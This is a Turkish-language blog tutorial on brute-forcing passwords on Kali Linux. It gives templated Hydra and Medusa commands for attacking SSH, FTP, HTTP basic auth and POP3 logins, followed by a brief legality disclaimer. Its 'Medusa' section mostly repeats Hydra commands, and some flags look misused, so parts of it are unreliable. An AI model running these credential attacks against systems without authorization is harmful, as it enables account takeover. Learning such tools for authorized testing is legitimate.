Kali Linux Şifre Kırma (Brute Force) Nasıl Yapılır?

Son güncelleme:
Can Kütahya avatarı
Yazar

Kali Linux Şifre Kırma (Brute Force) Nasıl Yapılır? 1
Kali Linux Hack Komutları

Kali Linux, sıradan bir işletim sistemi değildir. Birçok hacker aracını içinde barındırarak güvenlik testleri ve penetrasyon testleri için kullanılır. Bu nedenle, Kali Linux’un en popüler özelliklerinden biri brute force’dur. Brute force, bir şifreyi denemek için tüm kombinasyonları deneyerek bir hesaba erişmeye çalışma yöntemidir. Bu makalede, Kali Linux’ta brute force nasıl yapılır anlatılmaktadır.

Kullanılacak Araçlar

Brute force saldırıları için çok sayıda araç mevcuttur. Ancak, bu makalede iki araç ele alınacaktır:

  1. Hydra: Çoklu protokolleri destekleyen bir brute-force aracıdır.
  2. Medusa: Çeşitli protokoller üzerinde brute force saldırıları gerçekleştiren bir araçtır.

Kurulum

  1. Kurulu değilse Kali Kurulumu yapmalısınız : Kali Linux VirtualBox Kurulumu linkinden Kali Linux kurulumunu yapabilirsiniz.

2. apt-get ile hydra ve medua kurmalısınız. Aşağıda ki komutlar ile hydra ve medusa kurabilirsiniz.

Both tools can easily be installed on Kali Linux using the apt-get package manager. Here’s how to install them:

sudo apt-get update
sudo apt-get install hydra medusa

Hydra Kullanımı

Hydra, çoklu protokolleri destekleyen bir brute force aracıdır. Aşağıda, farklı protokoller için Hydra kullanarak nasıl brute force yapılacağı açıklanmaktadır.

SSH Brute Force

SSH brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -l [username] -P [passwords-list] [target-ip] ssh

Bunun yerine, tek bir şifre denemek isterseniz:

hydra -l [username] -p [password] [target-ip] ssh

FTP Brute Force

FTP brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -l [username] -P [passwords-list] [target-ip] ftp

Bunun yerine, tek bir şifre denemek isterseniz:

hydra -l [username] -p [password] [target-ip] ftp

HTTP Basic Authentication Brute Force

HTTP basic authentication brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -L [usernames-list] -P [passwords-list] [target-ip] http-basic

Bunun yerine, tek bir kullanıcı adı ve şifre denemek isterseniz:

hydra -u [username] -p [password] [target-ip] http-basic

POP3 Brute Force

POP3 brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -l [username] -P [passwords-list] [target-ip] pop3

Bunun yerine, tek bir şifre denemek isterseniz:

hydra -l [username] -p [password] [target-ip] pop3

Medusa Kullanımı

Medusa, çeşitli protokoller üzerinde brute force saldırıları gerçekleştiren bir araçtır. Aşağıda, farklı protokoller için Medusa kullanarak nasıl brute force yapılır anlatılmaktadır.

SSH Brute Force

SSH brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

medusa -u [username] -P [passwords-list] -h [target-ip] -M ssh

Bunun yerine, tek bir şifre denemek isterseniz:

medusa -u [username] -p [password] -h [target-ip] -M ssh

FTP Brute Force

FTP brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -l [username] -P [passwords-list] [target-ip] ftp

Bunun yerine, tek bir şifre denemek isterseniz:

hydra -l [username] -p [password] [target-ip] ftp

HTTP Basic Authentication Brute Force

HTTP basic authentication brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -L [usernames-list] -P [passwords-list] [target-ip] http-basic

Bunun yerine, tek bir kullanıcı adı ve şifre denemek isterseniz:

hydra -u [username] -p [password] [target-ip] http-basic

POP3 Brute Force

POP3 brute force saldırısı yapmak için, aşağıdaki komutu kullanabilirsiniz:

hydra -L <kullanıcı adı listesi> -P <şifre listesi> -s <POP3 sunucusu IP adresi> pop3

Bu komut, belirtilen kullanıcı adı ve şifre listelerini kullanarak POP3 sunucusuna Brute Force saldırısı yapacaktır. İpucu listeleri, test için kullanmak istediğiniz kullanıcı adları ve şifreler içeren bir metin dosyasıdır.

Ancak, bu tür saldırılar her zaman etik değildir ve yasal sonuçları olabilir. Bu nedenle, yalnızca yasal izinlerle ve etik sınırlandırmalarla test yapmanız önerilir.

Kali Linux’ta brute force saldırıları yapmak için en iyi araçlardan bahsetti ve bu araçların nasıl kullanılacağına dair adım adım talimatlar verdi. Brute force saldırıları, siber güvenlik dünyasında önemli bir taarruz tekniği olarak kabul edilir ve profesyonel güvenlik testleri veya penetrasyon testleri sırasında kullanılabilecek bir yöntemdir. Ancak, unutmayın ki bu tür saldırılar yasa dışı olabilir ve ancak yasal izinler alındıktan sonra kullanılmalıdır.

Umarım bu makale, Kali Linux kullanıcıları için faydalı bir kaynak olmuştur. Eğer herhangi bir sorunuz veya geri bildiriminiz varsa, lütfen yorum bölümünde belirtin. Teşekkür ederim!

Benzer İçerikler:

Kali Linux ve Kali Linux Purple Nedir?
Kali Linux Komutları: Hacking, Pentesting ve Network Security İçin Eğitim ve En Önemli Komutlar
Kali Linux Saldırıları Nasıl Yapılır?
Kali Linux Araçları: En İyi Hacking Aracları

Yorum yapın

Teknoloji, eğitim ve açık kaynak dünyasında kendimizi geliştirmeye adamış tutkulu bir sitedir. Sitemizde yer alan içerikler, Teknoloji Haberleri başta olmak üzere; KubernetesDocker, DevOps, Yazılım Geliştirme, OpenShiftContainerLinux işletim sistemi, Veritabanları, Ağ teknolojileri ve daha birçok konuda hazırlanmaktadır

İletişim

Can Kütahya

© Can Kütahya 2024

Ana SayfaHakkımızda Gizlilik Politikası / Privacy Policy